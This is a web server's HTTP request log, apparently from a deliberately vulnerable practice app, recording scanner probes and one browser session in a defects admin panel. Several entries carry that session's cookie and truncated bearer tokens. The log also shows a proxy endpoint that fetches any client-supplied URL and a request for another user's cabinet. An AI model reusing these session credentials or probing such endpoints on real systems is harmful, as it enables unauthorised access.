===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.111:56752
Path: /login
URL: /login
Method: GET
[2026-03-18 03:00:59] === HTTP Request ===
[2026-03-18 03:00:59] Main page accessed - IP: 45.156.129.112:58226
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.112:58226
Path: /
URL: /
Method: GET
[2026-03-18 03:00:59] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.110:57522
Path: /wp-json
URL: /wp-json
Method: GET
[2026-03-18 03:00:44] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.113:45498
Path: /license.txt
URL: /license.txt
Method: GET
[2026-03-18 03:00:24] === HTTP Request ===
[2026-03-18 02:59:35] Main page accessed - IP: 45.156.129.110:49236
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.110:49236
Path: /
URL: /
Method: GET
[2026-03-18 02:59:35] === HTTP Request ===
[2026-03-17 23:14:07] Main page accessed - IP: 87.236.176.47:43027
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru:8081
RemoteAddr: 87.236.176.47:43027
Path: /
URL: /
Method: GET
[2026-03-17 23:14:07] === HTTP Request ===
[2026-03-17 23:01:57] Main page accessed - IP: 205.210.31.57:63360
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.57:63360
Path: /
URL: /
Method: GET
[2026-03-17 23:01:57] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.100:49103
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 21:59:07] === HTTP Request ===
[2026-03-17 21:59:07] Main page accessed - IP: 104.152.52.100:56789
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.100:56789
Path: /
URL: /
Method: GET
[2026-03-17 21:59:07] === HTTP Request ===
[2026-03-17 21:42:01] Main page accessed - IP: 176.65.149.45:56874
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:56874
Path: /
URL: /
Method: GET
[2026-03-17 21:42:01] === HTTP Request ===
[2026-03-17 20:38:40] Main page accessed - IP: 207.90.244.26:34474
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.26:34474
Path: /
URL: /
Method: GET
[2026-03-17 20:38:40] === HTTP Request ===
[2026-03-17 20:01:33] Main page accessed - IP: 185.247.137.48:37361
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru:8081
RemoteAddr: 185.247.137.48:37361
Path: /
URL: /
Method: GET
[2026-03-17 20:01:33] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:47596
Path: /jars
URL: /jars
Method: GET
[2026-03-17 19:49:54] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.60:62112
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-17 19:40:10] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.60:62086
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 19:40:06] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.60:62076
Path: *
URL: *
Method: PRI
[2026-03-17 19:40:06] === HTTP Request ===
[2026-03-17 19:40:06] Main page accessed - IP: 66.132.153.60:62068
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.60:62068
Path: /
URL: /
Method: GET
[2026-03-17 19:40:06] === HTTP Request ===
[2026-03-17 19:40:03] Main page accessed - IP: 66.132.153.60:16444
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.60:16444
Path: /
URL: /
Method: GET
[2026-03-17 19:40:03] === HTTP Request ===
[2026-03-17 18:43:07] Main page accessed - IP: 34.140.119.220:38406
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.140.119.220:38406
Path: /
URL: /
Method: GET
[2026-03-17 18:43:07] === HTTP Request ===
===================
Via: 2.0 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 162.243.208.127
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40080
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 18:39:48] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 185.247.137.158
Via: 2.0 Caddy
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40080
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 18:39:47] === HTTP Request ===
[2026-03-17 18:39:47] Main page accessed - IP: 172.30.0.12:40080
===================
X-Forwarded-Proto: https
Referer: http://admin.vulnberries.ru
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 87.236.176.90
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40080
Path: /
URL: /
Method: GET
[2026-03-17 18:39:47] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:34806
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-17 17:45:44] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Te: trailers
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Pragma: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Dest: script
Cache-Control: no-cache
Accept: */*
X-Forwarded-For: 79.139.135.199
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-17 17:42:33] === HTTP Request ===
===================
Sec-Fetch-Dest: style
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Accept: text/css,*/*;q=0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Priority: u=2
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33070
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-17 17:42:33] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 79.139.135.199
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: script
Pragma: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33070
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-17 17:42:33] === HTTP Request ===
[2026-03-17 17:42:33] Login page accessed - IP: 172.30.0.12:33070
===================
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: document
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33070
Path: /login
URL: /login
Method: GET
[2026-03-17 17:42:33] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Accept: */*
X-Forwarded-For: 79.139.135.199
X-Forwarded-Proto: https
Pragma: no-cache
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-17 17:42:32] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Accept: */*
X-Forwarded-Proto: https
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: no-cors
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Pragma: no-cache
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-17 17:42:32] === HTTP Request ===
===================
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Cache-Control: no-cache
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Accept: */*
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-17 17:42:32] === HTTP Request ===
===================
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Cache-Control: no-cache
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: style
Priority: u=2
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Mode: no-cors
Pragma: no-cache
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-17 17:42:32] === HTTP Request ===
[2026-03-17 17:42:32] Defects page accessed - IP: 172.30.0.12:33060
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Te: trailers
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Pragma: no-cache
Cache-Control: no-cache
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33060
Path: /defects
URL: /defects
Method: GET
[2026-03-17 17:42:32] === HTTP Request ===
[2026-03-17 17:38:07] Media proxy request - url: https://media.vulnberries.ru/media?filename=53, IP: 172.30.0.12:57052
===================
Sec-Fetch-Dest: empty
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Mode: cors
Priority: u=4
Cookie: auth=sess_1773767135317065279; user_id=1
X-Forwarded-For: 79.139.135.199
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D53
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D53
Method: GET
[2026-03-17 17:38:07] === HTTP Request ===
[2026-03-17 17:38:07] Media proxy request - url: https://media.vulnberries.ru/media?filename=53, IP: 172.30.0.12:57052
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
Cookie: auth=sess_1773767135317065279; user_id=1
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Priority: u=4
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D53
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D53
Method: GET
[2026-03-17 17:38:07] === HTTP Request ===
[2026-03-17 17:38:07] Defect detail page accessed - defect_id: f6e01be4-d9bc-4b06-9522-9cc828e9e6d9, IP: 172.30.0.12:57052
===================
Priority: u=0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1773767135317065279; user_id=1
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects/f6e01be4-d9bc-4b06-9522-9cc828e9e6d9
URL: /defects/f6e01be4-d9bc-4b06-9522-9cc828e9e6d9
Method: GET
[2026-03-17 17:38:07] === HTTP Request ===
[2026-03-17 17:38:02] Defects page accessed - IP: 172.30.0.12:57052
===================
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1773767135317065279; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: cors
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects
URL: /defects
Method: GET
[2026-03-17 17:38:02] === HTTP Request ===
[2026-03-17 17:37:55] Media proxy request - url: https://media.vulnberries.ru/media?filename=2, IP: 172.30.0.12:57052
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773767135317065279; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Via: 2.0 Caddy
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=4
If-Modified-Since: Thu, 12 Feb 2026 17:07:11 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D2
Method: GET
[2026-03-17 17:37:55] === HTTP Request ===
[2026-03-17 17:37:55] Defect detail page accessed - defect_id: b78f03e5-4524-4cb6-b982-feebf83e3cbe, IP: 172.30.0.12:57052
===================
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1773767135317065279; user_id=1
Accept: */*
Sec-Fetch-Site: same-origin
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: cors
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
URL: /defects/b78f03e5-4524-4cb6-b982-feebf83e3cbe
Method: GET
[2026-03-17 17:37:55] === HTTP Request ===
[2026-03-17 17:37:51] Defects page accessed - IP: 172.30.0.12:57052
===================
Cookie: auth=sess_1773767135317065279; user_id=1
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-For: 79.139.135.199
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Mode: cors
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects
URL: /defects
Method: GET
[2026-03-17 17:37:51] === HTTP Request ===
[2026-03-17 17:37:47] Media proxy request - url: https://media.vulnberries.ru/media?filename=25, IP: 172.30.0.12:57052
===================
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Priority: u=4
Accept: */*
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Dest: empty
Cookie: auth=sess_1773767135317065279; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Query: url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D25
Path: /api/media
URL: /api/media?url=https%3A%2F%2Fmedia.vulnberries.ru%2Fmedia%3Ffilename%3D25
Method: GET
[2026-03-17 17:37:47] === HTTP Request ===
===================
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Sec-Fetch-Site: same-origin
If-Modified-Since: Sun, 25 Jan 2026 11:28:38 GMT
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Cookie: auth=sess_1773767135317065279; user_id=1
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /static/defect_detail.js
URL: /static/defect_detail.js
Method: GET
[2026-03-17 17:37:47] === HTTP Request ===
[2026-03-17 17:37:46] Defect detail page accessed - defect_id: 10442cf9-525a-45b8-a7d0-538899a1d09e, IP: 172.30.0.12:57052
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1773767135317065279; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Authorization: Bearer Bearer eyJhbGciOiJIU...
Te: trailers
Sec-Fetch-Mode: cors
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects/10442cf9-525a-45b8-a7d0-538899a1d09e
URL: /defects/10442cf9-525a-45b8-a7d0-538899a1d09e
Method: GET
[2026-03-17 17:37:46] === HTTP Request ===
===================
Via: 2.0 Caddy
Sec-Fetch-Dest: script
If-Modified-Since: Mon, 10 Nov 2025 15:08:02 GMT
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1773767135317065279; user_id=1
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /static/defects.js
URL: /static/defects.js
Method: GET
[2026-03-17 17:37:44] === HTTP Request ===
[2026-03-17 17:37:44] Defects page accessed - IP: 172.30.0.12:57052
===================
Sec-Fetch-Mode: cors
Cookie: auth=sess_1773767135317065279; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Site: same-origin
X-Forwarded-Host: admin.vulnberries.ru
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Priority: u=0
Accept: */*
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /defects
URL: /defects
Method: GET
[2026-03-17 17:37:44] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
If-Modified-Since: Mon, 10 Nov 2025 15:08:02 GMT
Sec-Fetch-Dest: script
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 79.139.135.199
Cookie: auth=sess_1773767135317065279; user_id=1
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-17 17:37:42] === HTTP Request ===
[2026-03-17 17:37:42] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:57052
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: empty
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Cookie: auth=sess_1773767135317065279; user_id=1
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Priority: u=4
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57052
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-03-17 17:37:42] === HTTP Request ===
[2026-03-17 16:47:25] Login page accessed - IP: 172.30.0.12:58374
===================
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
